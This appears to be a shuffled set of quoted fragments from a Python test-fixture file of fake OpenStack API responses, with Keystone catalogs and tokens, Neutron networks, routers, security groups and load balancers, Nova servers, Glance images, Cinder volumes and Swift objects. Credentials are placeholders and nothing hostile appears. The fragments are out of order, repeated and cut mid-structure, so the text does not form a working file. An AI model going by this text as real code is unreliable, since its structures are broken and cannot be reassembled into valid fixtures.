"'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage Service', 'type':",
"\"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [",
"permissions and limitations # under the License. TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>'",
"FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": None, \"floating_ip_address\": \"172.24.4.227\",",
"\"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] } IMAGES_LIST = { \"images\": [ { \"checksum\":",
"{ \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\":",
"{u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id':",
"\"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\"",
"'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"\"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\":",
"4, \"shared\": False } ] } SERVERS_LIST = { \"servers\": [ { \"accessIPv4\":",
"\"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\":",
"the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law",
"\"None\" } ] } SNAPSHOTS_LIST = { \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\":",
"\"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\":",
"Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\":",
"'endpoints_links': [], 'name': 'Volume Service', 'type': 'volume' }, { 'endpoints': [{ 'adminURL': 'http://admin:9292/v1',",
"You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0",
"u'type': u'application/pdf'} ], u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type': u'application/vnd.openstack.identity-v2.0+xml'}",
"NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS =",
"\"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\", \"health_monitors\": [],",
"\"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None,",
"\"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False } ] }",
"\"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\":",
"= { \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\":",
"\"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0]",
"= 'http://public:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_PUBLIC_ENDPOINT = 'https://network0.cw-labs.net' COMPUTE_PUBLIC_ENDPOINT = 'https://compute0.cw-labs.net/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_PUBLIC_ENDPOINT = 'https://metric0.cw-labs.net' ORCHESTRATION_PUBLIC_ENDPOINT =",
"\"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\":",
"IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT",
"0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 4955792,",
"{ \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1],",
"'endpoints_links': [], 'name': 'EC2 Service', 'type': 'ec2' }, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0',",
"\"id\": FIREWALL_IDS[0], \"description\": \"\" }, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\":",
"\"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\":",
"\"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\":",
"}, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": { \"id\": \"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\":",
"'name': 'Metering service', 'type': 'metering' }, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT,",
"'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage Service', 'type': 'object-store' },",
"} ] } LBAAS_VIP_LIST = { \"vips\": [ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\",",
"\"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False } ]",
"[ { \"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\":",
"}, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ { \"direction\": \"egress\",",
"\"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\":",
"\"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 3714968, \"status\": \"active\", \"updated_at\":",
"u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type':",
"\"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups',",
"'name': 'Orchestration service', 'type': 'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant':",
"[ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, {",
"} ] } NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [ {",
"STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\"",
"\"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST = {",
"\"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\", \"links\":",
"{ \"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ { \"direction\":",
"\"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\",",
"# # Copyright © 2014 Cloudwatt # # Licensed under the Apache License,",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\":",
"[], 'name': 'Compute Service', 'type': 'compute' }, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL':",
"SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily backup\", \"volume_id\": \"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\":",
"{ \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] },",
"= 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT =",
"\"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\":",
"\"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST = {",
"\"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[0]",
"'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service', 'type':",
"\"status\": \"ACTIVE\", \"subnets\": [\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\":",
"\"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\":",
"label test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label",
"\"network_3\", \"admin_state_up\": True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] } SECGROUPS_LIST",
"u'object_count': 22, u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST = {",
"[], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [],",
"LBAAS_VIP_IDS[0], \"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1,",
"\"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\":",
"\"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:4a:3a:a2\",",
"NETWORKS_LIST = { \"networks\": [ { \"status\": \"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\":",
"{ \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\":",
"\"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ {",
"[\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\"], \"name\": \"nova\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False }, {",
"\"fake\" } ] } IMAGES_LIST = { \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\":",
"u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types': [",
"} FIREWALL_POLICY_LIST = { \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID,",
"False, \"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\",",
"'endpoints_links': [], 'name': 'Network Service', 'type': 'network' }, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777',",
"\"protected\": False, \"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\":",
"FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\" } ] } FIREWALL_RULE_LIST = { \"firewall_rules\":",
"\"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST = { \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\",",
"None, \"floating_ip_address\": \"172.24.4.227\", \"port_id\": None, \"id\": FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST = {",
"= [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"]",
"\"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ] }",
"\"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] }, \"links\": [",
"\"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\",",
"'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject' } }, 'user': { 'id': USER_ID, 'name':",
"None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID",
"{ \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ]",
"True } ] } SECGROUPS_LIST = { \"security_groups\": [ { \"description\": \"Custom Security",
"[{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [],",
"u'status': u'stable', u'updated': u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container':",
"service', 'type': 'orchestration' }], 'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description':",
"agreed to in writing, software # distributed under the License is distributed on",
"{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\":",
"u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0',",
"\"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0],",
"'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service', 'type': 'ec2'",
"test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID,",
"'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696' COMPUTE_INTERNAL_ENDPOINT = 'http://nova.usr.lab0.aub.cw-labs.net:8774/v2/43c9e28327094e1b81484f4b9aee74d5' METERING_INTERNAL_ENDPOINT = 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777' ORCHESTRATION_INTERNAL_ENDPOINT = 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1'",
"} ] STORAGE_OBJECTS_LIST_1 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\":",
"\"rel\": \"bookmark\" } ], \"metadata\": { \"My Server Name\": \"Apache1\" }, \"name\": \"new-server-test\",",
"'token': { 'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description': '', 'enabled': True, 'id':",
"\"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\" }, {",
"\"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5,",
"[ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\":",
"\"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\":",
"\"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\":",
"\"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ] }, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\"",
"'exampleproject' } }, 'user': { 'id': USER_ID, 'name': 'exampleuser', 'roles': [{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74',",
"\"First test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\",",
"None, \"id\": LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST = { \"members\": [ { \"id\":",
"\"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\":",
"], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\": False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\",",
"}, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL': ORCHESTRATION_INTERNAL_ENDPOINT, 'publicURL': ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links':",
"} SNAPSHOTS_LIST = { \"snapshots\": [ { \"id\": SNAPSHOTS_IDS[0], \"display_name\": \"snap-001\", \"display_description\": \"Daily",
"None, \"disk_format\": \"aki\", \"id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\",",
"14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = { \"volumes\": [ { \"attachments\":",
"\"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\":",
"\"flavor\": { \"id\": \"1\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/flavors/1\", \"rel\": \"bookmark\" } ]",
"VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS = [\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\",",
"'', 'enabled': True, 'id': PROJECT_ID, 'name': 'exampleproject' } }, 'user': { 'id': USER_ID,",
"PROJECT_ID }, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ { \"direction\":",
"} ] } ALARMS_LIST = [ { \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0],",
"0, \"name\": \"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\":",
"\"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None,",
"False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall policy 2\" } ] } FIREWALL_RULE_LIST =",
"limitations # under the License. TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID =",
"NETWORK_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Network Service', 'type': 'network' }, { 'endpoints':",
"\"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ { \"direction\": \"egress\", \"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\",",
"}, \"protected\": False, \"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\",",
"[{ \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"second_routers\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\":",
"\"HTTP\", \"id\": LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST = { \"vips\": [ { \"status\":",
"{ \"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\": 14,",
"\"ACTIVE\", \"subnets\": [\"a318fcb4-9ff0-4485-b78c-9e6738c21b26\"], \"name\": \"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False",
"to in writing, software # distributed under the License is distributed on an",
"} ] } FLOATING_IPS_LIST = { \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID,",
"\"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\":",
"\"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\":",
"\"servers\": [ { \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": { \"private\": [ { \"addr\":",
"ORCHESTRATION_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Orchestration service', 'type': 'orchestration' }], 'token': {",
"\"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] +",
"[{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name': 'hello world'}]",
"'bar'}, {'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\",",
"\"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ],",
